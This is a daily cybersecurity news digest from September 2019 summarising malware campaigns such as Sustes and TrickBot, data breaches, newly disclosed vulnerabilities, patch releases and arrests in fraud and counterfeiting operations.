Silobreaker Daily Cyber Digest – 11 September 2019
Exim vulnerability exploited to deliver Sustes malware
- Positive Technologies researchers detected a wave of attacks in which the Exim mail server vulnerability CVE-2019-10149 is exploited to deliver the cryptominer Sustes.
- The malware is delivered using two methods. The first one involves a chain of scripts that installs the Monero miner on the host and adds it in crontab. One of the scripts adds a public SSH key to a user’s ‘authorized_keys’, which allows an attacker to obtain SSH access to the systems without a password.
- The second method involves a chain of Python scripts, one of which contains a scanner for random Redis servers. Similar to the first method, the malware adds itself to crontab for autorun and adds its own key a list of trusted SSH keys.
Source (Includes IOCs)
Cylance researchers publish analysis of TrickBot malware
- Trickbot malware was discovered in the wild in 2016 and continues to be updated and developed. The malware attempts to steal information and perform man-in the-middle attacks on banking websites.
- The malware is delivered through emails and illegitimate websites, with malicious emails primarily relating to banking topics. Targets are often asked to enable document editing at which point a macro uses a script to enable a PowerShell to download the malware.
- Upon execution the malware pulls files from its C2. Additional DLL files give the malware reconnaissance functions and allow it to steal a wide variety of information. The malware also contains worm modules which allow it to spread across local networks.
- A full technical analysis is available via Cylance.
Source (Includes IOCs)
Leaks and Breaches
Premier Family Medical hit by ransomware attack
- A ransomware attack on the Utah-based physician group Premier Family Medical took place on July 8th, 2019, and may have exposed private health information of 320,000 patients. All ten of its Utah County locations were impacted. It is unclear whether a ransom was paid.
Private data of 2 million Verizon Pay Monthly customers exposed
- Security researcher Daley Bee was able to access 2 million Verizon Pay Monthly contracts after bruteforcing GET parameters for a Verizon-owned subdomain, allowing him to be treated as an authenticated user. The subdomain is used by employees to access internal Point of Sales tools and view customer information.
- Exposed data includes full names, addresses, mobile numbers, model and serial number of purchased devices, and signatures.
Community Psychiatric Clinic data breaches affect 15,537 patients
- Mental health services provider Community Psychiatric Clinic suffered three separate email security breaches, affecting 3,030, 6,641, and 5,866 patients respectively. The breaches were reported to the Department of Health and Human Services’ Office for Civil Rights’ on August 15th, 2019.
- It is unclear whether the three breaches include two data breaches previously reported on, which took place on March 12th and May 8th, 2019.
Vulnerabilities found in OpenEMR
- Two vulnerabilities were discovered affecting the open-source medical records management tool OpenEMR version 5.0.1(6). Older versions are also believed to be affected. The flaws were patched with version 5.0.2.
- CVE-2019-8371, an arbitrary remote code execution vulnerability, could allow attackers to modify files within the OpenEMR application web root.
Source (Includes IOCs)
XSS flaw found in Premium Addons for Elementor WordPress plugin
- Plugin Vulnerabilities researchers discovered the authenticated persistent cross-site scripting (XSS) flaw after noticing a hacker probing usage of the WordPress plugin ‘Premium Addons for Elementor’. The researchers also found further insecure code, suggesting the plugin may contain additional vulnerabilities.
Microsoft Patch Tuesday fixes two-zero days
- On September 10th, 2019, Microsoft released their monthly security update which patched 80 CVEs across 15 products and services. 17 issues are rated as critical and a further 62 are assessed as important.
- Two zero-day issues, tracked as CVE-2019-1215 and CVE-2019-1214, are privilege elevation vulnerabilities. The former exists in the way Winsock handles objects in memory and the latter is related to the way Windows Common Log File System handles objects in memory.
- Three vulnerabilities, CVE-2019-1235 in Windows Text Service Framework, CVE-2019-1253 in Windows AppX Deployment Server and CVE-2019-1294 in Windows Secure Boot were also publicly disclosed.
Adobe release patches for arbitrary code execution
- On September 10th, 2019, Adobe released patches for three security vulnerabilities in Adobe Flash Player and Adobe Application Manager.
- Adobe Flash Player contains two critical vulnerabilities tracked as CVE-2019-8070 and CVE 2019-8069. Both flaws could lead to arbitrary code execution.
- CVE-2019-8076 is a flaw related to a DLL hijacking vulnerability which could enable arbitrary code execution within the Application Manager.
Multiple vulnerabilities uncovered in D-Link and Comba Telecom network products
- Trustwave researcher Simon Kenin discovered that the D-Link DSL-2875AL router is impacted by a vulnerability which was previously identified in other D-Link products. An attacker could exfiltrate both router settings and the password, which is stored in clear text, by sending a crafted request to the web management server. This attack can be performed without authentication.
- DSL-2875AL and DSL-2877AL models also display HTML code on their login page which corresponds to the credentials required to authenticate with the Internet service provider.
- Credential vulnerabilities were also identified in Comba Telecom’s AC2400 Wi-Fi Access Controller, AP2600-I Wi-Fi Access Point and AP2600 Wi-Fi Access Point.
Basic Laboratory Information System (BLIS) impacted by two critical vulnerabilities
- CVE-2019-5617 impacts BLIS 3.5 and earlier. The flaw is due to issues in authentication and authorization verification and can lead to unauthenticated password resets.
- CVE-2019-5644 impacts BLIS 3.51 and earlier can cause unauthenticated updates to user data and includes admin privilege escalation.
- A third vulnerability, tracked as CVE-2019-5643, is rated as high severity. The flaw impacts BLIS 3.51 and earlier, and can lead to unauthenticated enumeration of facilities and usernames.
Intel chip vulnerability allows attackers to steal sensitive information
- Researchers at VUSec discovered a vulnerability in Intel’s performance enhancing Data-Direct I/O (DDIO) technology. DDIO is used in recent Intel server grade processors and solves bottleneck constraints by allowing peripherals to operate direct cache access on the CPU’s last-level cache.
- The researchers developed an attack, dubbed NetCAT, which they claim is the ‘first network-based cache attack on the processor’s last level-cache of a remote machine’. When Remote Direct Memory Access (RDMA) and DDIO are enabled an attacker can perform a side channel attack by sending specially crafted network packets to a DDIO-capable CPU.
- The researchers showed that they could then perform a keystroke timing attack to identify what a target was typing in a private SSH session.
- Intel classified the issue as low severity but did advise disabling DDIO and RDMA on affected CPUs or limiting direct access to vulnerable systems from untrusted networks.
Local privilege escalation vulnerability found in Microsoft Windows 10
- Fortinet researchers discovered an additional vulnerability, tracked as CVE-2019-1287, capable of local privilege escalation in Windows Network Connectivity Assistant affecting Windows 10 Enterprise or Education versions. A patch was released with the latest update.
- The vulnerability allows for process creation impersonation that can lead to privilege escalation when a Remote Procedure Call server tries to impersonate the client and start a process at the same time without the use of an explicit token.
- A similar flaw was previously found and reported to Microsoft, however no patch was made available.
Microsoft Teams package can be used to deliver malware
- Researcher Reegun Richard identified an EXE sideloading attack that abuses the Squirrel installation and update framework to execute malicious payloads using mock installation folders.
- Impacted products that use the Squirrel installation and update framework include WhatsApp, Grammarly, GitHub, Slack, and Discord.
- The researcher tested the attack by crafting a fake Microsoft Teams package that leverages a signed binary to execute in a specific location. Microsoft were informed of the issue but stated that it ‘did not meet the bar of a security issue’.
Menstruation apps found to be sharing data with Facebook
- A study by Privacy International found that multiple menstruation apps are sharing personal data with Facebook, as well as other third parties. The apps include Maya by Plackal Tech, MIA by Mobapp Development Limited, My Period Tracker by Linchpin Health, Ovulation Calculator by Pinkbird, and Mi Calendario by Grupo Familia.
- According to Privacy International, the type of information a user enters into the apps could be considered health or medical data, which is deemed sensitive data under EU data protection laws. The researchers also noted that all apps inform Facebook when a user opens it before a user has agreed to the apps’ privacy policies.
- Plackal Tech has since removed Facebook SDK and Analytics SDK from its app. Facebook SDK is used for the integration of an app with Facebook’s platform.
Members of major dark web counterfeit currency ring arrested
- Europol announced that the Portuguese Judicial Police, in cooperation with Europol, arrested five individuals who were part of Europe’s second-largest counterfeit currency network on the dark web. The individuals are accused of counterfeiting and organised crime.
- A total of 1833 counterfeit banknotes, as well as computers, printers, security papers with security thread incorporation, and more were seized following the arrest.
International operation to prevent BEC attacks lead to arrest of 281 individuals
- On September 10th, 2019, the US Department of Justice announced the results of a multi-agency investigation, named Operation reWired, which led to the arrest of 74 people in the US and 207 overseas on charges relating to financial fraud. 167 individuals were arrested in Nigeria, 18 in Turkey, and 15 in Ghana. Further arrests were also made in France, Italy, Japan, Kenya, Malaysia, and the UK.
- Operation reWired took place over a period of four months and involved organizations including the US Department of Homeland Security, the US Department of Justice, the US Department of the Treasury, and multiple partner organizations overseas. The investigation disrupted BEC schemes and resulted in the seizure of $3.7 million.
- The FBI also published information on September 10th, 2019, which showed that between June 2016 and July 2019, over $26 billion was reportedly lost globally in BEC scams.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.